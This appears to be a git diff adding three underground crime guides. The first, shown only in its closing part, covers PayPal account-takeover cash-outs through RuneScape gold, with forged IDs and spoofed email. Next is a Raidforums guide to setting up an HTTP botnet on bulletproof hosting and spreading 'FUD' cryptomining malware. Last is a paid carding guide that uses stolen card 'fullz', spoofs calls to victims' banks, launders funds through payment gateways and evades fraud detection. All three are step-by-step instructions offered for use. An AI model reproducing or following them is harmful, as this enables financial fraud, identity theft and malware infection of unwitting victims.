DNS +The solution below does not switch the adapter to static if you are +using DHCP. If you do not switch to a static IP configuration and +your computer renews its IP address whilst connected to the VPN, the +DNS settings may be overwritten. It is highly recommended to switch +to a static IP configuration. +1. Open the command prompt (cmd.exe) as an administrator. 2. Before +connecting identify the name of the connected network interface. In +the case below it is "Local Area Connection" +netsh interface show interface +3. Connect to the VPN. Once connected proceed to the next step. 4. +Flush the DNS resolver cache +ipconfig /flushdns + +5. Disable the DNS configuration for the Interface identified in step +1 +netsh interface IPv4 set dnsserver "Local Area Connection" static +0.0.0.0 both +6. Test for DNS leaks. 7. After disconnecting, reconfigure the +adapter to renew the previous DNS settings +netsh interface IPv4 set dnsserver "Local Area Connection" dhcp +8. Once again, flush the DNS resolver cache. +ipconfig /flushdns +9. Done. +Credit to https://www.dnsleaktest.com for this info. +Then remember to check again and if your ISP is the one through your +VPN provider, you are safe. +If you want extra layer of fat so nothing can be compromised, I +recommend a Virtual Computer. I call this the ‘Compception’. As +basically it is a computer, within a computer. Not to go into to much +detail, but Paypal is jointed to a security company that allows them +to log information more than a single IP. They have the ability to +log your IP Address, Time Zone, User Agent and more. This actually +adds a fatter chance of payment success. +NOW THAT’S ALL EXPLAINED. Finally we can move on actually paying +successfully. +First make sure you have the following things with you: Paypal +Account (3+ Recommended as 1 may not work for no reason at all). +Socks 5 + VPN (VIP72 + HMA Recommended) Virtual Server (VMWARE/VPS +Recommended) (Optional) (Not Necessary) Credit Card (Optional) (Not +Necessary) +First of all, setup your Virtual Server (as I said, optional). Then +open your VPN and connect to the closest city/state to that PP +Account owner. Once you are done connecting connect to your Socks5 to +the closest city/town/state to the PP owner. Not sure where your PP +owner resides? Check one of his/her transactions and look at the +shipping details or address. +So what you want to do is login successfully into the Paypal Account +using Socks 5 + VPN (make sure you clear cookies first). Once you +login Paypal will create a cookie (data which saves information that +you logged in). Then you will wait till the next day to login and +Paypal will recognize the cookie and giving you a higher chance of +sending funds. +Now comes the part where you must take action. + +Making the order on a MMO Site is what you need to do now. I +recommend searching for ‘RuneScape Gold CHEAP’ for easy websites to +cashout from. +I decided to choose https://www.easyplaygame.com as my MMO Currency +provider. Now to the order page. I decided to purchase from the $40 +mark as an example. Just a note, the lower the amount, the more +likely it is to be accepted as payment. +Once you click ‘BUY NOW’ this page should appear: +For the ‘FULL NAME’ enter the name of the Cardholder/ Paypal Account +(MANDATORY). For the email address, put in either your email address +if you are cashing out via CC. However if you are using PP Account, +it ‘MUST’ be the hacked Paypal email address you are using to +cashout. For the phone number, you can type in your mobile phone +number, burner phone number, if you do not have any of the above, +then I have a guide included in the .rar called ‘FREE US Number +Method.pdf” And you can put your number there in the ‘Phone Number’. +For your character name, you must register a Runescape account and +then set your username. +You must have the LATEST version of Java for this work. Go to +http://www.runescape.com/game.ws +This will open a java applet where it loads up the game. If it is +your first time playing then it should probably take a while. +Click on the ‘RED BOX’. It will prompt you to characterise your +Runescape character (takes 1 click) just click confirm. Then it will +ask for your email, password, age and character name. Make sure the +character name matches the one you put above in the order detail +page. You must remember the password and email. +For eg: +Once registered, it will log you in. Click ‘PLAY NOW’. +Then you will be entered a world and that’s where you must begin. It +will play a tutorial (which takes 10 minutes) but you can skip it by +pressing the ‘ESC’ button and click skip tutorial. +Then you will be teleported to the docks. Just click proceed until +you are out of the message box. Now teleport to lumbridge by using +the load stone here +Once that is done, this box should appear. +Then click on the one with the RED BOX on it. +Once you have done that your minimap on the TOP RIGHT should look +like this: +Now what you need to do is click on the EARTH looking globe on the +bottom right of the minimap to open your MAP. +This is where you need to get to. Double click anywhere around the +‘GRAND EXCHANGE’ to create a marker. So once your exit the MAP you + +will be able to see a flashing arrow all the way to the GE from where +you are at. Walk there using your character. +We need to be here as 90% of Chinese goldfarmers trade here and give +the gold to you. +Now go back to your order page, and click ‘COMPELTE’. Once you have +done that it will redirect you to the Paypal payment gateway. +Click ‘LOGIN’ and pay through. Using the equipment I told you in the +‘SECURITY’ phase in Step 1, the payment should go through. Sometimes +it doesn’t as I explained before its just one of paypals bullshit +outcomes (they have absolutely no reason to stop your payment, they +just do it because its Paypal). So if in any case it doesn’t, simply +just use a different paypal account. +Anyway since it does accept it, it will give you a transaction id +when you login to the account. Now what you want to do is click ‘LIVE +CHAT’ on the Chinese GoldFarmers website as you need to have a chat +with them. Basically to outline what you are going to talk about, is +you have to inform them you +have paid. They will ask for Order ID or Transaction ID. All you need +to do is give it to them via Live Chat. Once you do that, they will +tell you to wait. Once confirmed.. you will need to open Adobe CS5. +Now they will either ask you for a ID or a phone call. Assuming you +have Adobe CS5, open the .PSD I have given you with the .rar file. +All you need to do is edit the names and picture on the ID. If you +need help with this ‘SIMPLE’ task… You know what to do +(ICQ/TORCHAT/PM/JABBER). I’ll help you out so you will know how to do +it. +Now that your ID problems are sorted, they will ask you to email to a +specific email address using the ‘PAYPAL email’. Now your wondering +“I don’t have access to the paypal email! How the hell do I send a ID +as attachment without the password?” EASY. Go to the fake mailer +http://emkei.cz/ and change the sender email so when they receive it, +it will be the Paypal Email. +Now if they ask for a phone call (they normally only do if you order +$100+). You will need to get your burner phone ready or Ninja Lite +softphone (if you followed my US Number tutorial). Now before you are +ready to pick up the phone, you must have the following details: +Name of Paypal Account, Paypal Email, amount sent, age. Easy right? +Oh and for the age, just make sure it is over 18+ or else they will +hang up and refund your money as you are not old enough to have a +Paypal. Seriously this verification call is all bullshit, they just +want to see if you are legit through the worst security measures ever +haha :D. + +Now that you are done, go back to the live chat and tell them you +were confirmed/verified and they will ask you to meet at a specific +world at the Grand Exchange. +For eg: “Please meet at w39 at GE” may be a common way they tell you. +So log out to the lobby, and click on 39 like on the screenshot +below. Now click PLAY NOW. +Now wait on that spot until a runescape character trades you. Accept +the trade and click accept twice on the trade screen when they put in +their money. +Once you are done, you have successfully 50% cashed out your CC/PP +funds. Now all you need to do is sell them. Oh by the way, I can buy +your Runescape Gold for $0.20 per million gold (via BTC) so contact +me on ICQ/Tor Chat/Jabber/PM. +Or if you don’t want to sell to me, go back to any of the Chinese +gold farming sites and click on live chat, and tell them you want to +sell gold. Obviously being the cheap fucks they are, they will offer +to buy your gold for a very LOW price. I recommend +https://www.r2pleasent.com as they accept BTC to buy your gold. +Just send them your BTC address and BOOM! You have successfully +cashed out PP/CC into BTC! +You can also cash it out into WU/PM if you want. +Final Notes: Paypal Fraud Detection also has the power to see your +timezone and keyboard language. Change the keyboard language to the +cardholder/Paypal owners country and match the timezone. It increases +chances of paying DRASTICALLY. diff --git a/Mining Botnet_pdf.md b/Mining Botnet_pdf.md new file mode 100644 index 0000000..f99ad09 --- /dev/null +++ b/Mining Botnet_pdf.md @@ -0,0 +1,287 @@ +# Mining Botnet + + +--- + +by XKeyscore - Raidforums.com NOTE: ALWAYS RUN +​ ​ ​ ​ ​ ​ ​ ​​ ​​ ​ ​ ​ ​ ​ +CRACKED ITEMS IN +​ ​ ​ ​ +VIRTUAL MACHINE +​ ​ +How to make a mining botnet +​ ​ ​ ​ ​ ​ ​ ​ ​ ​ +About: +A botnet can be defined as a network of infected computers. It can be used for numerous +reasons in this guide I will be covering how to make money with it. I have been working with +botnets and on botnets for several years and I’m now here to share some knowledge. In this +tutorial I will only be explaining HTTP botnets, but that will be covered from start to end. Which +hopefully will give you the knowledge to make your own. +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +When categorizing botnets we will often and most likely hear about 3 types, if talking HTTP. +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +- Loader +- Stealer +- DDOS +Loader is made to hold the bots for the longest period of time possible, this often only allows +simple features as download & execute, update, uninstall and a simple botkiller. A botkiller is +used to remove all other malware, to make sure you get the most out of their pc. +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +Stealers are used to steal data, passwords, logins, credit cards, ftp clients basically everything +there is to steal (Of course depending on the botnet.) A very well known stealer could be +Neutrino HTTP. +​​ +DDOS botnets are typically the most known among the community and the reasons are good. +You have to option to make something go offline with a various of different ddos methods. This +can also be used for money if you make a ransom demand or rent it out. +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +Free Botnets +​ ​ +- Betabot is a strong multitask and native bot, this can be found cracked all over the +internet, but watch out for malware. This is one of the best choices to hold a good +amount of bots, it is featured with one of the best botkillers out in the public, AV Killer, +Persistence, Hosts file editor, few simple ddos methods overall a very nice and stable +botnet. +- Novobot is loader made in C++, very simple botnet. +​​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +- Gaudox is a freeloader, released by excr4sh. It has a decent crypter and is possible +​ +one of the best choices if you need to hold a fair amount of bots +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +- Loki is a very popular stealer +​​​ ​​ ​​ ​​ ​​ +- OmegaNet is a botnet based of LiteHTTP (OPEN-SOURCE on github), it +​ +differentiates from the original LiteHTTP by being classed as a multi-task botnet +instead of a loader. +​​ ​​ ​​ +- DiamondFox is a multi task botnet, very good many people use it.. +​​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ + +by XKeyscore - Raidforums.com NOTE: ALWAYS RUN +​ ​ ​ ​ ​ ​ ​ ​​ ​​ ​ ​ ​ ​ ​ +CRACKED ITEMS IN +​ ​ ​ ​ +VIRTUAL MACHINE +​ ​ +Paid Botnets +​ ​ +- Quant - Loader: https://forum.exploit.in/index.php?showtopic?=108142 +​​ ​​ ​​ +- Neutrino: https://forum.exploit.in/index.php?showtopic?=78268 +​​ +- Miner Bot: https://forum.exploit.in/index.php?showtopic?=125036 +​​ ​​ +- Azourult - Stealer: https://forum.exploit.in/index.php?showtopic?=100 +​​ ​​ ​​ +- Godzilla - Loader: https://forum.exploit.in/index.php?showtopic?=98946 +​​ ​​ ​​ +Hosting +So, before you go out believing you can conquer the world with only the first page you are wrong. You +will have to read everything in this ebook to be successful. When making botnets there is a clear nono +that is using normal hosting. No, you can not use google vps, amazon vps or any of “normal” hosting +sites. You will be in need of a offshore / bulletproof server and domain, this will save you from a lot of +trouble in the future. +​​ ​​ ​​ +Offshore / Bulletproof hostings: +​​​​ ​​ +- Panamaserver.com +- Offshoreracks.com +- CCIHosting.com +- r01.ru +- nic.ru +- tonic.tu +- openleaf.net.ru (Most populare with beginers.) +​​ ​​ ​​ ​​ +When buying hosting i suggest you are purchasing with “Fast Flux”, It’s a proxy system that hides +your servers real ip. +​​ ​​ ​​ +Setting up your VPS +​ ​ ​ ​ ​ ​ +Once you have purchase your hardware, you will begin to look at software. You should make sure you +get SSH, FTP and control panel details. SSH is used to execute all your commands and to control +your OS (Operating System). FTP is used to transfer files between you and your server. Control panel +is used for statistics, reinstalling server, reboot and for setting up your domains. +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +To access your SSH you are going to be needing Putty, which can be found here: +http://www.putty.org/ once you have downloaded you should use your login credentials to access your +servers. +Centos 6 SSH Installation +​​ ​​ ​​ +a. We will start out by updating our server and install wget and vim. You will throughout +​ ​ +installation be asked to confirm, in that case you press “Y” and enter. +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +Execute these commands in this order. +​​ ​​ ​​ ​​ ​​ +- sudo yum update +​​ ​​ +- sudo yum install wget +​​ ​​ ​​ +- sudo yum install vim +​​ ​​ ​​ + +by XKeyscore - Raidforums.com NOTE: ALWAYS RUN +​ ​ ​ ​ ​ ​ ​ ​​ ​​ ​ ​ ​ ​ ​ +CRACKED ITEMS IN +​ ​ ​ ​ +VIRTUAL MACHINE +​ ​ +b) After you have done that you will need to install Apache +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​​ ​​ +Execute these commands in this order. +​​ ​​ ​​ ​​ ​​ +- sudo yum install httpd +​​ ​​ ​​ +- sudo service httpd start +​​ ​​ ​​ +Once you have done that simply proceed. +​​ ​​ ​​ ​​ ​​ ​​ +c) Now we will need to install PHP. In most scenarios we are going to be needing a fully update +PHP, so we will install it and then upgrade it using REMI and EPEL Repositories. +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​​ ​​ ​​ ​​ +- sudo yum install php +​​ ​​ ​​ +Installing the repositories +​​ ​​ +- wget https://dl.fedoraproject.org/pub/epel-release-latest-6.noarch.rpm && rpm -Uvh +​ +epel-release-latest-6.noarch.rpm +- wget http://rpms.famillecollet.com/enterprise/remi-release-6.rpm && rpm -Uvh +​ +remi-release-6*.rpm +You will now need to enable the REMI repository globally. We will be needing VIM, the free text editor +we used before. (PRESS: Insert to edit and ESCAPE to go into command mode) Now go into +command mode and type this +​​ ​​ ​​ ​​ +- vim /etc/yum.repos.d/remi.repo +​​ +Now press insert and under the section [remi] and [remi-php56] change the following from 0 to 1: +enabled = 0 now press ESC again and type out the following command: +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +- :wq +We will now be upgrading our PHP: +​​ ​​ ​​ ​​ ​​ ​​ +- sudo yum -y upgrade php* +​​ ​​ ​​ ​​ +d) We will now be installing MySQL +​​ ​​ ​​ ​​ ​​ +- sudo yum install mysql mysql-server +​​ ​​ ​​ ​​ +Now we will run MySQL +​​ ​​ ​​ ​​ +- sudo service mysqld start +​​ ​​ ​​ +Using these commands you can check your MySQL version and upgrade +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +- yum -y update mysql* +​​ ​​ ​​ +- rpm -qa⎜grep mysql +​​ ​ ​ ​ +d.1) These may not be necessary, but a few botnets need more PHP libraries- This can be +achieved like so. +​ ​ ​ ​ + +by XKeyscore - Raidforums.com NOTE: ALWAYS RUN +​ ​ ​ ​ ​ ​ ​ ​​ ​​ ​ ​ ​ ​ ​ +CRACKED ITEMS IN +​ ​ ​ ​ +VIRTUAL MACHINE +​ ​ +- sudo yum install php-mysql php-pdo php-common php-cli php-gd +​​ ​​ ​​ ​​ ​​ ​​ ​​ +e) You are almost done setting up your server, nice of you to make it this far! You will +now need to install Ioncube loader. You can download it of +https://ioncube.com/loaders.php I use Centos 6 64-bit, so i will use Linux 64-bit. +Checking through the link above, you will often get quite confused unless you know +what you are doing, therefore check your php version like so. +​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ +- php -v +​ ​​ ​​ +In my scenario i have installed PHP 5.6, which will mean i download the file called: +ioncube_loader_lin_5.6 and upload it to my server. Now this can be done with SSH, but for +the simplicity we will use FTP. Simply download a ftp client (etc. Filezilla) and login with your +credentials the rest should be easy for you as it will be extremely obvious. Now upload the +file you just downloaded to /usr/lib64/php/modules/ioncube_loader_lin_5.6.so You will now +need to use VIM again for editing php.ini, it can be found under /etc/php.ini +​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ +Execute the following command in ssh again +​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ +- vim /etc/php.ini +​ ​ +Press insert and add the following to the top of the file. It is just a path to Ioncube loader. It is +crucial that the version of Ioncube loader and php is the same!! +​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ +Add this line: +​ ​ ​ ​ +- zend_extension = /usr/lib64/php/moduels/ioncube_loader_lin_5.6.so +​ ​ ​ ​ +When that has been done we will restart apache and mysql to check if you have +installed it correctly. +​ ​ ​ ​ +- service httpd restart +​​ ​​ +- service mysqld restart +​​ ​​ +- php -v +​​ +f) You will now need to run a MySQL installation script. +​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ +- mysql_secure_installation +This will allow us to setup a new root password to your MySQL, if any other questions +pop up simply type yes. +​​ ​​ ​​ ​​ +Log into MySQL: +​​ ​​ +- mysql -u root -p +​​ ​​ ​​ +Create a new database: +​​ ​​ ​​ +- create database WhatEverYouCallIt +​​ ​​ + +by XKeyscore - Raidforums.com NOTE: ALWAYS RUN +​ ​ ​ ​ ​ ​ ​ ​​ ​​ ​ ​ ​ ​ ​ +CRACKED ITEMS IN +​ ​ ​ ​ +VIRTUAL MACHINE +​ ​ +Create a new user with privileges and refresh +​​ ​​ ​​ ​​ ​​ ​​ ​​ +- CREATE USER 'USERNAME'@'LOCALHOST' IDENTIFIED BY 'PASSWORD'; +​​ ​​ ​​ ​​ ​​ +- GRANT ALL PRIVILEGES ON WhatEverYouCallit . * TO 'USERNAME'@'LOCALHOST'; +​​ ​​ ​​ ​​ ​​​​ ​​ ​​ +- FLUSH PRIVILEGES; +​​ +You have now successfully setup a Centos 6 VPS with environments suited for the botnet. If +you will like a Centos 7 version I will make that as soon as anybody need it :) +​​ ​​ ​​ ​​ ​​ ​​ ​​​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +Making money +​ ​ +So, when all of that has been said and i went a bit off topic- Let’s get into the money making of it. +You should now have a botnet setup and ready to go. So, how do i make money? +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​​​ ​​ +When you have everything setup, you need to build your stub (The infected file / Trojan). To build +the stub open up your builder, each botnet has a different builder. If you are using a cracked +botnet be careful, it may be backdoored!!!! Building the stub should be very easy, most botnets +come with instructions on how to do it- Usually you only need to fill in spaces. Once you have +done that, you will need to encipher your stub. After you have done that, you can start spreading. +I won’t be covering that, so find some leak of books from HF :) I may link some if many need it. +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​​​ ​​ ​​ ​​ ​​ ​​ ​​ +You are now far enough in this process to give yourself a clap on the shoulder, you did good so far. I +don’t believe you already have a silent miner before reading this, but find one on the various of +different forums A silent miner is simply Crypto Mining Malware. Cryptocurrency mining is a +computationally intensive task which requires powerful resources from specialized hardware and +dedicated processors- Which has a significant electricity costs and the invest in hardware is simply to +much to avoid costs of expensive hardware, we will infect multiple systems and consume the users' +CPU and GPU power. . You will be charged for these, but they usually only cost around $20-30- +Which is a very cheap expense. If you have bought it, ask the seller if it is FUD (Fully Undetectable) if +it is carry on, if it isn’t encipher the build you got. Now comes the really easy part, login to your botnet +find tasks and upload the FUD silent miner build. +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ +Many people would go for the most logical way, which is to mine bitcoin. But the most profitable is +Monero (XMR). +​​ +You are now making money! Keep spreading and if you need help message me :) +​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ ​​ diff --git a/MisterBitcoins Paypal Guide_pdf.md b/MisterBitcoins Paypal Guide_pdf.md new file mode 100644 index 0000000..04216ad --- /dev/null +++ b/MisterBitcoins Paypal Guide_pdf.md @@ -0,0 +1,602 @@ +# MisterBitcoins Paypal Guide + + +--- + +Misterbitcoin Paypal Guide V1.0 + +INTRODUCTION: +First I would like to thank you for purchasing this guide and wish you good +luck on your paypal ventures :) Everything I wrote here is from personal +experience, I tried my best to explain everything as clearly as possible and +not forget any details but if something isn't clear send me a PM and I'll be +glad to answer any questions. +Guide Overview: +Although the guide's main purpose is for transfers and middle man +account's I've included some of my own cash out methods. The guide is in 6 +sections that build on each other. +Section 1: The transfer setup I use for my own transfers (From verified +accounts) +Section 2: Mass transfers from CC's(what most PP vendors are doing) + +Various gateways and ecommerce +Section 3: Building your own Middle man Accounts(or buying them) + +aging/transaction history + +Section 4: Paypal transfer funnel (how transfers should be sent) +Section 5: Cash outs +Section 6: Resources +Please read the guide in order(1-6) as each step has building blocks for the +following sections. +Across the guide you will see "TIPS" highlighted, please pay special +attention to these as they will most likely save you a lot of grief. +While the earning potential with Paypal is great, it also requires a lot of +planning and attention to details to be successful. +Let's Begin!! +SECTION 1: +Overview: +The typical way to send a paypal transfer is to buy stolen CC's and card a +payment gateway which leads to the middle man account(I will be going +over this in detail in section 2). + +A gateway is just something simple like "instabuck" that allows you to +upload a product, such as ebooks, and make a paypal payment link, you +then proceed to card this link with the stolen cc. +The good thing about this system is that its quick and easy and you can +make ALOT of transfers in one day with minimal effort. +The bad thing about this system, depending how strong your middle man +account is, it can raise some red flags as its coming direct from CC. Paypal +and the payment gateways are also continuously updating their security so +often need to update methods to beat PP/gateways. +So now that we got that covered here's the overview for the method in this +section: +We will be creating paypal accounts that are verified and then use a +combination of paypal credit/bill me latter(this a credit line that paypal +makes for you, explained in details below) + the vic's credit card. +Why is this better? +1) Sending from a verified account will be alot less "hard" on your middle +man accounts(which mean's you can send more funds without being +limited, will also look better if the account goes under review) +2) With your credit line you can split up the payments (ex: if you have 2K +credit line can make 4 x 500) +3) Can double dip the account and send from the CC on file +4) Funds will most likely stick longer + +Now if your new to payal this might not make much sense now but don't +worry I'll be going step by step below: +Resources Checklist/explanation: +1) RDP/Dedicated SOCKS5/VPS +2) USA CC Fullz +3) Phone number(optional) +4) Generic e-mail +5) vba/VCC(optional) +6) Phone spoofer +TIP: Paypal is a resources game. You'll burn through alot of fullz, cc's, rdp's +etc. Buying in bulk cuts down the price to 1/3-1/5 of original price which +makes a huge difference in the long run!! +1) RDP/Dedicated SOCKS5/VPS +Alright so let's get started, the first thing we're going to need is the RDP/VPS +In layman's terms a VPS/RDP is basically another computer that’s hosted +somewhere else. You’re going to use these as the personal computer to +open the paypal accounts. +Paypal is ultra sensitive about IP address/cookies. With a VPS/RDP you are +able to create a paypal account and login with the same IP and cookies +which will save you from alot of the dreaded paypal erors. +You could also make a new virtual machine on your computer and buy a +dedicated socks5 etc but I find using rdp/vps alot easier. + +Were to buy: EVO is filled with sellers you can buy from hacked and none +hacked. You can also Google search usa vps/rdp and there's plenty of +companies selling them. Buy from one that has bitcoin payment as option +Hacked VS not hacked: Hacked rdp's/vps is a computer that’s been +infiltrated by one of the vendors, the owner still has access to it and can see +what you’re doing. +These are ok to use in this instance as we won't be using these for long but +if you’re going to make a cashout/middle man account I would for certain +get a none hacked one that you have complete control over and will last +long( I typically use none hacked regardless). +Now that you have the vps/rdp you can login on to it, this will be different +depending what OS you’re using, but it’s very straight forward and the +vendor will give you all the information you need. +ALWAYS!! Connect to the rdp/vps through a security barrier; never connect +using your own isp!! +Once your logged on you’ll notice that the computer is bare so you’ll need +to install firefox and flash. +Step one is done let's move on to creating the account... +2) USA CC FULLZ/Creating the PP account +First you'll need to make a generic e-mail(like gmail). I would use the full +name of the fullz to make it ex: jonsmith55@gmail.com +Next step is taking a matching fullz to the ip address of the rdp/vps and +using the information to open a paypal account. + +THe fullz your using should all be high level cards such as business, +signature, centurion etc as people with a $10K-30 000 credit card limit will +most likely have alot better credit then the basic 1K cards(which will come +in handy for the paypal credit) +TIP: if you’re buying the fullz per piece its sometimes easier to find a match +by buying the vps/rdp first and requesting a fullz from the vendor from the +same city. +Next we’re going to verify the account with a VBA(virtual bank account) You +can buy these from EVO or places like http://openvcc.com +(optional) Next were going to verify the paypal account with the vic's credit +card. Go to verify paypal and verify with credit card.. +Add in the CC details, paypal will then charge $1.95 to the vic's CC. On the +statement will appear paypal and a 4 digit code. + +The 4 digit code is what we need to verify the account. To get the code +we're going to call the bank's automatic system(don't worry you won't need +to talk to anyone) +To do this first make an account on https://www.spooftel.com, pay with +bitcoin. Next either using voip or burner phone(I would use burner phone if +possible as sometimes the banks automated system doesn't recognize the +numbers when key-ing the cc numbers) call the vic's banking number but +spoof the number to show as the phone number on the fullz +To find out the credit cards customer service number take the first 6 digit's +of the cc and go to binlist.net and look up the bank. Next just search the +bank number in google for that specific bank. +If you've done all the steps properly the automated system should only ask +for the last 4 digits of the card or the SSN number depending on the bank. +Press in the correct numbers. +If successful this will bring you to the telephone banking menu. Navigate +the menu to find recent transactions and listen to the amounts. It will say +something like charge $1.95 paypal 4051 (the 4 digits is what you need, +write this down) +Log back into the paypal accounts and enter the 4 digits in the verification +system. +Alright your account is now verified with a VBA and a CC from a big brand +brick and motor bank which will go a long way. +Now comes the easy stuff, your almost there! Login to paypal and apply for +paypal credit/bill me latter. They’ll ask you the DOB and last 4 digits of SSN +so make sure to have the fullz info in front of you. + +Once approved paypal credit will give you a credit line with a minimum of +$250 but if you followed my advice and used fullz with high level cc bins it +will be much higher, in the thousands. +Now when you’re ready to send a transfer you can send from panel and use +paypal credit/bill me latter OR if you’re paying an invoice etc you will see a +new tab now on checkout for paypal credit/bill me latter. Use that one! + +After you’ve used up the paypal credit line you can move on to using the +credit card on file for another 1-2 transfers J although I usually save this for +when my middle man accounts are near burnt. +I will go in depth on how to perform the transfers to middle man accounts +in the next section. +Alright take a deep breath, this may seem like a major pain in the ass now +but once you get use to it this process will only take 20-50 minutes of time +total and cost you anywhere from $40-$90 depending on success +ratio/price of resources BUT you can reap anywhere from $2000 to $5000+ +in transfers, from a verified account, the funds typically stick A LOT longer +and with the going rate of transfers @ 25%to35% you just saved yourself +anywhere from $500-$1800 +, not bad I would say ?! J +Things that can go wrong: +1) The credit card is already on file. Nothing we can do here will just +need to move on to another +2) The SSN used to register is already in use, again nothing we can do +here but use another fullz. +3) The vic notices the 1.95 charge on CC or they’ve paid for a very +advanced anti-fraud alert/monitoring system – this will get the +account closed but I’ve found this to be very rare. +I believe that covers everything for section 1, if you have any questions +please let me know! + +Section 2: Mass transfers +from CC's: +This section will cover how paypal transfers are typically made +Overview: The basics of this system is to make invoices/products through a +third party gateway such as payhip, instabuck, freshbooks etc or making +your own ecommerce website. There’s literally 100’s, if not 1000’s of +gateways online we can use to do this. +The gateway account is then linked to the middle man account. Once setup +you now have a link for XYZ product from the gateway which you can card +and then instantly fund the middle man account with. +Credit card > gateway > middle man +TIP: The single most important part to these transfers is the quality of the +cards. You want high end bins like signature, business centurion, platinum +etc. The reason for this is because which such high credit limits a $500- +$1000 transfer is less likely to be noticed by the cardholder then with low +limit cards. Since it’s a numbers game with these cards buying bulk for +discount will really pay off. I give a few sources for good cards at the end of +this guide in the resources section +While which gateway you decide to use does make a difference, as stated +above the cards are what makes a biggest difference. I will explain further +down the gateways I’ve used successfully but it’s important to remember +these are constantly changing to prevent fraud and you might need to +switch things up. + +Resources needed: +4) VM – Virtual machine +5) Credit card’s – High level bins +6) SOCKS – VIP72 etc +7) (Optional) U-Like tool (changes computer name, volume id #, +timezones etc) +8) Tool to change mac address +9) VPN/security barrier +10)(optional) user id changer +11)Cache/cookie cleaner (ccleaner, bitbleach) +STEP 1: Gateway +The first step is finding the gateway you’re going to use. As mentioned +above a gateway is a way to clean the funds from credit card to the middle +man account. +You can also make your own webstores/ecommerce platforms. Since the +steup for this is very long I’ve made a separate document for this which +will be included with this guide. +Some examples of gatesways I’ve used a lot: +Freshbooks.com +Instabuck.com +Payhip.com + +There’s literally 100’s of others and fundraising sites you can use to do this. +Just a simple google search will find plenty. +When you found a gateway you would like to use make an account on the +site with the same IP address as your middleman account and use the same +e-mail for registration as the PP middle man e-mail. +You can make invoices for anything, upload ebooks, make fundraisers at any +price you want. +My favorite is ebooks/online services as there are so many gateways for +this. If you go this route to make it look legit upload a real product and +description. +You can find marketing products and such leaked on wsodownloads.info or +other blackhat/leak websites. +Once done you’ll have a link from the website were your product is for +sale(which goes to your middle man account). Save the link in a txt file. +Alright so now you have a gateway and product setup for your middleman +account, it’s time to setup your computer for the transfer… +PART 2: Computer setup +First step is setting up a virtual machine on your computer. If you don’t +know how to do this PM and I’ll send a guide. +Next install the following things on VM: +12)I would recommend buying Mulac’s software, U- +like.http://k5zq47j6wd3wdvjq.onion/listing/15234 It changes the +volume id serial and username and a few other things in one shot. +You could do this manually but it easy this way. +13)Install ccleaner and bitbleacher (they are free to download, search on +google) This will be used for cleaning cookies + +14)Next install vip72 for socks – vip72.asia – They have a bunch of +different packages and you can pay via bitcoin. +15)Install firefox +16)Install firefox user agent changer plugin - +https://addons.mozilla.org/en-US/firefox/addon/user-agent- +overrider/ +17)Install MAC address changing tool - +http://www.technitium.com/tmac/ +18)VPN like mullvad https://mullvad.net/en/ +Alright now that we have everything installed here is the checklist that you +must do before each transfer +19)Change the mac address +20)Load U-Like and change computer name so same on CC and change +the serial +21)Set the user agent to the one you want, usually I use iphone and +tablet user agent. To find these search “user agent string iphone” and +then copy/paste it into the firefox user agent plugin you installed +previously. MAKE sure at the end of the string the language setting +matches the language of the vic’s country. +22)Open/run the vpn +23)Open vip72, select the same city as the credit card your going to use +for the transfer +24)Once you’ve clicked on the ip it will load on the main menu of vip72. +Right click the IP and change time zone to match ip and change to +match geo. Sometimes(rarely) vip72 doesn’t match the proper time +so its wise to search the city’s time to double check this is correct. +25)Run ccleaner and bitbleach to clean all cookies etc + +26)Next open browser and go to www.check2ip.com , make sure the IP is +not blacklisted and that the IP matches the one on display on vip72. +(TIP: don’t forget to load proxifier with vip72 or else vip72 won’t +work) +You’re now ready to make the transfer. Seems like a lot to do but once you +get use to it you can do all those steps in under a minute! +Now all you have to do is load the link you have for the product from the +gateway and enter all the credit card details and personal info. Make sure to +double check all the information for mistakes before submitting. +Congratulations, if everything went well the transfer went through! +Now another reminder I can’t stress how important the quality of the cards +you get are. With high quality cards my success ratio is usually over 80- +90%, but with bad cards I’ve had 0/30!! +Trouble shooting / Thing’s that can go wrong: +27)If your doing transfers for someone else often they lie and say they +have a business/premier account when its personal which can cause +success ratio to go down a lot +28)If the account is limited your transfer won’t go so make sure the +middle man or your customers account is in good shape +29)You have shit cards – this will most likely be the biggest problem, see +resources section for cards +30)The IP used wasn’t good which will decline the transaction +31)The transaction was reversed: This is most likely due to the middle +man account not being able to hand the funds +32)Nearly instant chargeback: Some people have sms banking alerts or +high fraud detection 